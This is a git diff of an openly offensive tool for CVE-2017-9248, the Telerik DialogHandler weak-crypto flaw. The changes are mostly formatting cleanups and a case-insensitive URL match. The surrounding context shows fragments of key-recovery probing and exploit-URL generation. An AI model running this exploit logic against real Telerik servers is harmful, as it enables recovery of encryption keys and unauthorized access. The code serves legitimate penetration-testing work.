blacklanternsecurity · liquidsec · Mar 17, 2023 · Mar 17, 2023 · Mar 17, 2023
diff --git a/dp_cryptomg.py b/dp_cryptomg.py
@@ -25,7 +25,6 @@ def do_work(self, CO):
         CO.findKey()
 
     def run(self):
-
         t = threading.Thread(target=self.worker)
         t.daemon = True
         t.start()
@@ -42,15 +41,13 @@ def terminal_cleanup(terminal):
 
 
 def main_usage():
-
     print("dp_cryptomg.py v0.1.3")
     print("Telerik DialogHandler Weak Crypto Exploit (CVE-2017-9248)")
     print("@paulmmueller\n")
     print("Black Lantern Security - https://www.blacklanternsecurity.com/\n")
 
 
 if __name__ == "__main__":
-
     parser = ArgumentParser(usage=main_usage())
     parser.add_argument("url", help="The target URL")
     #   parser.add_argument("-h", "--help", help="print the help screen and exit", required=False, action="store_true")
@@ -76,9 +73,9 @@ def main_usage():
     args = parser.parse_args()
     args, unknown = parser.parse_known_args()
 
-    if "Telerik.Web.UI.DialogHandler" in args.url:
+    if "Telerik.Web.UI.DialogHandler".lower() in args.url.lower():
         handler = "DH"
-    elif "Telerik.Web.UI.SpellCheckHandler" in args.url:
+    elif "Telerik.Web.UI.SpellCheckHandler".lower() in args.url.lower():
         handler = "SP"
     else:
         print("Invalid URL")

diff --git a/lib/dpcryptolib.py b/lib/dpcryptolib.py
@@ -13,7 +13,6 @@ def byte_xor(ba1, ba2):
 
 
 def repeated_key_xor(pt, key):
-
     len_key = len(key)
     encoded = []
     for i in range(0, len(pt)):
@@ -51,7 +50,6 @@ def __init__(
         terminal=None,
         mthlock=None,
     ):
-
         self.solved_blocks = []
         self.current_pos = 0
         self.request_count = 0
@@ -80,14 +78,12 @@ def __init__(
             self.proxy = None
 
         if knownkey:
-
             if len(self.knownkey) >= self.length:
                 self.finalkey = self.knownkey
             else:
                 self.solved_blocks = [self.knownkey[i : i + 4] for i in range(0, len(self.knownkey), 4)]
 
     def msgPrint(self, msg, style="normal"):
-
         now = datetime.now()
         self.terminal.log_messages.append((msg, style, now.strftime("%H:%M:%S")))
         self.terminal.log_messages_draw()
@@ -123,7 +119,6 @@ def findKey(self):
             return
 
     def generate_payload(self):
-
         if self.handler == "SP":
             self.msgPrint("Skipping version check / payload URL generation since handler is SpellCheckHandler")
             self.terminal.exploit_url_draw()
@@ -165,7 +160,6 @@ def generate_payload(self):
         return
 
     def versionProbe(self, fullurl, version):
-
         headers = {}
         if self.cookie:
             headers["cookie"] = self.cookie
@@ -179,7 +173,6 @@ def versionProbe(self, fullurl, version):
         return r
 
     def solveBlock(self):
-
         prefix = b"".join(self.solved_blocks)
         block = Block(self.url, prefix, self)
         block.find_baseline()
@@ -217,7 +210,6 @@ def __init__(self, url, prefix, parent):
         self.pos4 = KeyPosition(4, self)
 
     def sendProbe(self, randBytes, additionalParams=None):
-
         self.parent.detector_byte = randBytes.hex()
         self.parent.request_count += 1
         self.parent.terminal.footer_draw()
@@ -236,7 +228,6 @@ def sendProbe(self, randBytes, additionalParams=None):
             r = requests.get(fullUrl, headers=headers, verify=False, proxies=self.parent.proxy)
 
         elif self.parent.handler == "SP":
-
             fullUrl = f"{str(self.url)}"
             data = {
                 "DictionaryLanguage": "en-US",
@@ -332,7 +323,6 @@ def find_baseline(self):
         test_chars = [b"\x00", b"\x6b", b"\x08"]
 
         for i in itertools.product(test_chars, repeat=4):
-
             if self.sendProbe(b"".join(i)):
                 self.baseline = b"".join(i)
                 self.parent.msgPrint(f"Found detector byte baseline: [{self.baseline}]")
@@ -355,7 +345,6 @@ def __init__(self, pos, parent):
             self.possible_values.append(i)
 
     def solve_byte(self):
-
         if self.parent.parent.kill:
             raise WindowQuitException
 
@@ -388,7 +377,6 @@ def solve_byte(self):
                         fullprobe_list[1] = self.parent.pos2.solved ^ 65
                         fullprobe_list[2] = intProbe
                     elif self.pos == 4:
-
                         fullprobe_list[0] = self.parent.pos1.solved ^ 65
                         fullprobe_list[1] = self.parent.pos2.solved ^ 65
                         fullprobe_list[2] = self.parent.pos3.solved ^ 65
@@ -417,15 +405,13 @@ def solve_byte(self):
                     break
 
     def findSplittingProbe(self):
-
         split_dict = {}
         distance_dict = {}
         for b2 in range(256):
             bucket1 = []
             bucket2 = []
 
             for i in self.possible_values:
-
                 decrypted = i ^ b2
                 if isB64Character(chr(decrypted)):
                     bucket1.append(i)

diff --git a/lib/simpleterminalview.py b/lib/simpleterminalview.py
@@ -14,9 +14,7 @@ def __init__(self, *a, **kw):
         self.super_simple = False
 
     def msgprint(self, msg, time=None, severity="normal"):
-
         if self.super_simple == False:
-
             if severity == "normal":
                 msg_color = Fore.YELLOW
 
@@ -60,7 +58,6 @@ def sigwinch_handler(self):
         pass
 
     def config_draw(self):
-
         self.msgprint("CONFIGURATION:")
 
         if self.super_simple:
@@ -94,7 +91,6 @@ def config_draw(self):
         self.msgprint(f"Proxy: {proxyText}")
 
     def status_draw(self):
-
         solved_key_text = b"".join(self.cryptomg.solved_blocks).hex()
         if len(solved_key_text) > 0:
             self.msgprint("STATUS:")
@@ -108,13 +104,10 @@ def status_draw(self):
             self.msgprint(f"Possible Values")
 
     def possible_values_draw(self):
-
         self.msgprint(" ".join([self.make_readable(x) for x in self.cryptomg.possible_values]))
 
     def log_messages_draw(self):
-
         while len(self.log_messages) > 0:
-
             log, severity, time = self.log_messages.pop(0)
             self.msgprint(log, time=time, severity=severity)
 
@@ -128,7 +121,6 @@ def progress_bar_draw(self):
         pass
 
     def exploit_url_draw(self):
-
         if (self.cryptomg.handler == "SP" and self.cryptomg.findKeyComplete == True) or (
             self.cryptomg.handler == "DH" and self.cryptomg.exploit_url != ""
         ):
@@ -146,11 +138,9 @@ def exploit_url_draw(self):
                 output_message += f"Failed to save key! ({Fore.red}{e}{Style.RESET_ALL})"
 
             if self.cryptomg.handler == "SP":
-
                 self.msgprint("SpellCheckHandler Endpoint can only be used to retrieve key", severity="error")
 
             elif self.cryptomg.handler == "DH":
-
                 self.msgprint(f"Exploit URL: {self.cryptomg.exploit_url}")
                 filename_exploit = f"{getScriptRoot()}/cryptomg_exploiturl_{host}.out"
                 try:

diff --git a/lib/terminalview.py b/lib/terminalview.py
@@ -56,7 +56,6 @@ def sigwinch_handler(self):
         self.do_render()
 
     def config_draw(self):
-
         # configuration
         print(self.t.move(2, 4) + self.t.white_on_black(self.t.bold("CONFIGURATION:")))
         print(
@@ -107,7 +106,6 @@ def config_draw(self):
         )
 
     def status_draw(self):
-
         # status
         print(self.t.move(9, 4) + self.t.white_on_black(self.t.bold("STATUS:")))
 
@@ -144,7 +142,6 @@ def status_draw(self):
         print(self.t.move(16, 4) + self.t.white_on_black(self.t.bold("Possible Values")))
 
     def possible_values_draw(self):
-
         pv_width = int(self.t.width / 2) - 5
 
         for n in range(0, 10):
@@ -160,7 +157,6 @@ def log_messages_draw(self):
         log_width = int(self.t.width / 2) - 16
         processed_logs = []
         if len(self.log_messages) > 0:
-
             for i in reversed(self.log_messages):
                 render = None
                 log, severity, time = i
@@ -234,7 +230,6 @@ def progress_bar_draw(self):
         )
 
     def exploit_url_draw(self):
-
         if (self.cryptomg.handler == "SP" and self.cryptomg.findKeyComplete == True) or (
             self.cryptomg.handler == "DH" and self.cryptomg.exploit_url != ""
         ):
@@ -254,15 +249,13 @@ def exploit_url_draw(self):
                 output_message += self.t.red(f"Failed to save key! ({e})")
 
             if self.cryptomg.handler == "SP":
-
                 print(
                     self.t.move(39, int(self.t.width / 2) + 5)
                     + self.t.white_on_black(self.t.bold("Exploit URL:"))
                     + self.t.red_on_black(self.t.bold(" SpellCheckHandler Endpoint can only be used to retrieve key"))
                 )
 
             elif self.cryptomg.handler == "DH":
-
                 print(self.t.move(39, int(self.t.width / 2) + 5) + self.t.white_on_black(self.t.bold("Exploit URL:")))
 
                 filename_exploit = f"{getScriptRoot()}/cryptomg_exploiturl_{host}.out"
@@ -278,7 +271,6 @@ def exploit_url_draw(self):
             wrapped_output_message = self.t.wrap(output_message, width=eu_width)
             line_count = 0
             for line in wrapped_output_message:
-
                 print(self.t.move(40 + line_count, int(self.t.width / 2) + 5) + self.t.white(self.t.bold(line)))
                 line_count += 1